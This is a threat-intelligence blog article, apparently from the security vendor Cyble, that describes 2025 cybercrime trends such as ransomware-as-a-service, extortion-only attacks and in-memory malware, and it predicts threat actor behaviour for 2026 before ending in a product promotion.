The modus operandi of cybercriminals since the early 90s has come a long way. For example, the hackers in the 90s hacked because of their curiosity or for fun – Millenials, remember the Y2K worm? But three decades later, it’s a notoriously thriving ecosystem.
Attacks have become industrialized. AI, ransomware-as-a-service, and complex multi-stage tactics are hitting larger organizations and critical infrastructure.
The threat actor trends in 2025 (discussed later in the article) highlight how AI-driven threat actors and highly coordinated cybercriminal groups became more advanced.
In short, the way cybercrime groups and threat actors planned, executed and scaled their operations became much better. Cybercriminals also began to leverage technology better and were able to cooperate and execute their attacks in a very timely and coordinated manner.
This resulted in the top cyber threat actors of 2025 being able to execute more operations than in years prior to 2025.
Many hackers have shifted their approach to finding and using the best possible opportunities to commit cybercrime for profit while attempting to reduce the risk of being caught by law enforcement.
While threat actors in the past would carry out attacks based on opportunities as they arise, many cybercriminal organizations now have developed new methods that allow them to have long-term systematic access to their target’s complete network environment.
Who is a Threat Actor?
Any entity that purposefully engages in malicious activity targeting computer systems, networks, or data is considered a “threat actor.” The defining characteristic of this term is its broad nature, encompassing not just the “skill level” or “motivation” of the “actor” but rather the action (behavior) taken with regard to the objective of the actor and the intent behind the action.
The spectrum of threat actor activity ranges from individual operators who use small-scale fraud or malware campaigns, to organized crime syndicates, to state-aligned entities that possess infrastructure (supporting resources), tool(S), and operational discipline.
Commonalities between threat actors include the exploitation of cyber techniques, including uploading malware, phishing for access, using ransomware, stealing credentials, and exploiting software or hardware security vulnerabilities to compromise (attack) the target.
A threat actor is identified not only by one attack, but instead by a pattern of continuous (consistent) risk posed by ongoing (frequent) intentional activity. New and emerging threat actor tactics of 2026 will further define how these actors leverage AI, automation, and long-term strategic access.
Threat Actors vs. Hackers: A Functional Distinction
When we refer to “threat actor” and “hacker,” we tend to use these terms interchangeably, but they are actually different. A “hacker” is someone who possesses technical skills and knowledge that allows them to manipulate computer systems or software in various ways.
Although they may use their abilities for a good cause, to protect systems, or for other reasons, there are many different kinds of hackers, some are considered ethical, penetration testers or security researchers; however, unethical hackers do not fall into the category of threat actors because their intentions were non-malicious.
In contrast, a “threat actor” is defined as someone who has malicious intent toward the target. Regarding the technical prowess, a threat actor’s skill level does not matter as its relative to their target and what they want to do is harmful, such as compromise, exploit, or disrupt the target.
The threat actor behavior of 2025 shows that all threat actors behave in a threatening manner by conducting hacking activities or abusing digital systems, unlike all hackers who may act ethically.
Therefore, just to summarize:
- Not all hackers engage in threatening behaviors.
- All threat actors behave in a threatening manner by conducting hacking activities or abusing digital systems.
This distinction between the two terms is important in defensive strategy because a strategy should always be focused on intention and the nature of the behavior being displayed and not just the technical indicators of the attack.
Core Categories of Threat Actors
Cybercrime is primarily driven by financial motives and typically involves ransomware, fraud, data theft, or extortion. Cybercriminals often scale their operations for maximum profit and adopt a more or less opportunistic approach; however, some cybercriminals have begun to develop a more strategic approach to conducting the cybercrime business.
Nation-state hackers act on behalf of the government or state and conduct a variety of espionage, surveillance, influence operations, and cyber-warfare activities. Nation-state actors primarily target government networks, critical infrastructure, defense, and strategic industry within their state or government.
Hacktivist hackers are ideologically and/or politically motivated hackers. The goal of hacktivist hackers is to disrupt the services used by their target, disclose sensitive information to the public, and embarrass the target they are attacking.
Insider threats are cybercriminals that have access to an organization’s networks, computers, or systems. Employees or contractors with insider access may intentionally abuse their access or abuse their access through negligence.
Insider threats often do not have to bypass perimeter defense systems because they have legitimate access to the networks.
The low-skill hacker uses tools that have previously been created or existing exploits that have been leaked, or ransomware-as-a-service platforms. While low-skill hackers have significantly less technical expertise than other types of cybercriminals, they still pose a direct risk because of their ability to use tools, volume of attacks, and automated processes.
Why the “Threat Actor” Lens Matters
Focusing on threat actors rather than isolated incidents changes how risk is assessed. Individual attacks are symptoms; threat actors represent ongoing capability and intent.
Understanding who is behind an attack, how they typically operate, and what they target allows security experts to anticipate future activity instead of reacting to past damage.
The cyber threat trends of 2025 show that threat actors reuse infrastructure, share tooling, and adapt tactics across campaigns. Defense efforts that ignore the actor behind the activity miss the broader pattern, and that gap is where most damage occurs.
1. Ransomware Shifted from Opportunistic Crime to Strategic Disruption
Ransomware threat actors of 2025 were no longer driven purely by fast financial returns. According to Cyble’s Global Threat Landscape Report: H1 2025, cybercrime groups such as Akira demonstrated deliberate sector-based targeting, focusing on industries where operational disruption creates cascading economic and reputational consequences. Manufacturing, professional services, and critical business services also became consistent targets, particularly across Europe.
Akira’s renewed focus on the DACH region followed by a calculated geographic pivot rather than random expansion. These regions function as industrial and logistical hubs, where downtime carries immediate financial and regulatory impact.
This approach suggests that ransomware groups are prioritizing leverage and systemic pressure over attack volume, a trend expected to intensify in 2026.
2. Ransomware-as-a-Service Became Fully Industrialized
Ransomware-as-a-Service (RaaS) models continued to mature in 2025, transforming ransomware into a scalable criminal ecosystem. Qilin exemplified this trend by enabling affiliates to conduct highly customizable attacks across healthcare, manufacturing, construction, and public services.
In April 2025 alone, Qilin claimed 72 victims. Its infrastructure supported global operations spanning the U.S., Europe, India, Singapore, and beyond. In the APAC region, Qilin led ransomware activity with 32 reported attacks during H1 2025.
The success of RaaS platforms indicates a future where attack frequency is driven less by core operators and more by decentralized affiliates, making attribution, disruption, and defense more complex.
3. Extortion-Only Attacks Replaced Traditional Encryption in Many Campaigns
One of the most notable shifts in 2025 was the growing abandonment of encryption altogether. New ransomware groups such as Dire Wolf, Silent Team, DATACARRY, Gunra, and the actor known as “J” relied on data theft and leak-based extortion without deploying ransomware lockers.
This model reduces execution time, lowers detection risk, and exploits reputational damage as the primary pressure mechanism. Victims often discover breaches only when their data appears on leak sites.
In 2026, this trend is likely to expand as organizations improve backup resilience but remain vulnerable to public exposure.
4. Attackers Prioritized Data Theft Before Any Disruptive Action
Exfiltration-first strategies became standard practice across ransomware and malware campaigns. Rather than encrypting systems immediately, attackers focused on stealing sensitive data early in the intrusion lifecycle.
This approach ensures leverage even if encryption fails, or recovery mechanisms exist. It also enables secondary monetization through underground markets. As regulatory penalties and reputational damage increasingly outweigh operational downtime, data theft will remain central to threat actor strategy in 2026.
5. Living-Off-the-Land Techniques Became the Default, Not the Exception
Threat actors in 2025 relied heavily on legitimate system tools to evade detection. PowerShell, Windows Management Instrumentation (WMI), Remote Desktop Protocol (RDP), and native Windows binaries were frequently abused to execute commands, move laterally, and maintain persistence.
Because these tools blend into normal administrative activity, they immediatly reduce the effectiveness of signature-based detection. The threat actor behavior of 2025 shows this trend reduces signature-based detection effectiveness.
This reliance on Living-Off-the-Land techniques suggests that attackers will continue favoring stealth and persistence over speed in 2026.
6. Multi-Stage, Memory-Resident Malware Chains Increased in Complexity
Malware campaigns observed in 2025 featured multi-layer loaders designed to operate almost entirely in memory. A campaign analyzed during the year demonstrated how obfuscated PowerShell scripts enabled multiple security protocols, retrieved payloads from Pastebin, and executed them using in-memory techniques.
These loaders performed layered Base64 decoding, decryption with hardcoded keys, and delayed execution before deploying final-stage malware. Internet connectivity checks using legitimate domains preceded payload delivery, further reducing detection risk. Such complexity signals that memory-based attacks will dominate advanced malware campaigns moving forward.
7. DLL Sideloading and Legitimate Library Abuse Expanded
Threat actors made extensive use of DLL sideloading in 2025 to hide malicious code within trusted executables. For example, in modern cyber threat campaigns, a legitimate executable loaded a malicious DLL, which then decrypted embedded payloads and injected them into trusted Windows libraries such as dbghelp.dll and pla.dll.
By modifying memory permissions and overwriting legitimate library contents, attackers can conceal malicious execution within trusted processes. This technique complicates forensic analysis and increases dwell time; an approach likely to expand further in 2026.
8. Information-Stealing Malware Became a Core Payload, Not an Add-On
Malware such as Lumma Stealer and Amadey Bot played a central role in 2025 campaigns. These payloads were not secondary tools but primary objectives, designed to harvest credentials, browser data, and system information before ransomware or extortion actions occurred.
Lumma Stealer was commonly injected into newly spawned processes such as msiexec.exe, while Amadey Bot established persistence via scheduled tasks disguised as legitimate services.
The emphasis on credential harvesting suggests attackers are building access pipelines for future attacks rather than one-time payouts.
9. Industry Targeting Remained Highly Predictable, and Unchanged
The threat actor victimology in 2025 followed consistent patterns. Financial services remained attractive due to direct access to funds and sensitive data. Healthcare organizations were targeted because operational disruption carries life-and-death implications.
Government entities faced espionage, disruption, and political pressure, while education institutions remained vulnerable due to large user bases and weaker security budgets.
Energy, utilities, retail, and e-commerce continued to face elevated risk due to their criticality, payment data, and customer scale. These targeting patterns are unlikely to change in 2026, but attack sophistication against these sectors will continue to rise.
10. Threat Actors Operated as Ecosystems, Not Isolated Groups
Perhaps the most important trend from 2025 was the transformation of cybercrime into an interconnected ecosystem. Shared tools, affiliate programs, underground marketplaces, and overlapping infrastructure blurred the lines between distinct threat groups.
Lower barriers to entry, combined with modular tooling and shared intelligence, allowed new actors to gain the spotlight quickly while established groups refined strategy rather than tactics. In 2026, defenders will face not just individual attackers, but fluid networks of collaboration and competition.
What These Trends Signal for 2026
Trends in threat actor activity in 2025 will be a continuation of the trend toward precision-driven, high-impact operations that began with increased attacks on the financial sector.
The 2026 threat actor landscape will be characterized by a greater emphasis on how targets are chosen than on the number of targets chosen.
In 2026, attackers will focus on precision and high-impact targets rather than volume.
- Ransomware incidents may drop in frequency but increase in severity.
- RaaS platforms will operate modularly, improving efficiency and resilience.
- AI-Driven Threat Actors will standardize multi-stage, in-memory attacks.
- Targeting will remain deliberate across manufacturing, healthcare, energy, logistics, and public services.
Cybercriminals will optimize proven tactics and collaborate on TTPs, leaving reactive defenders at a disadvantage. With AI-driven intelligence and real-time insights, organizations need proactive solutions to fight against cybercrime groups.
Cyble provides award-winning threat intelligence and AI-native cybersecurity platforms that predict, detect, and neutralize threats before they impact your organization.
Trusted by hundreds of global enterprises and recognized by Gartner and Forrester, Cyble delivers actionable insights across ransomware, nation-state attacks, and cyber threat actor tactics.
Experience AI-powered security in action with Cyble today!
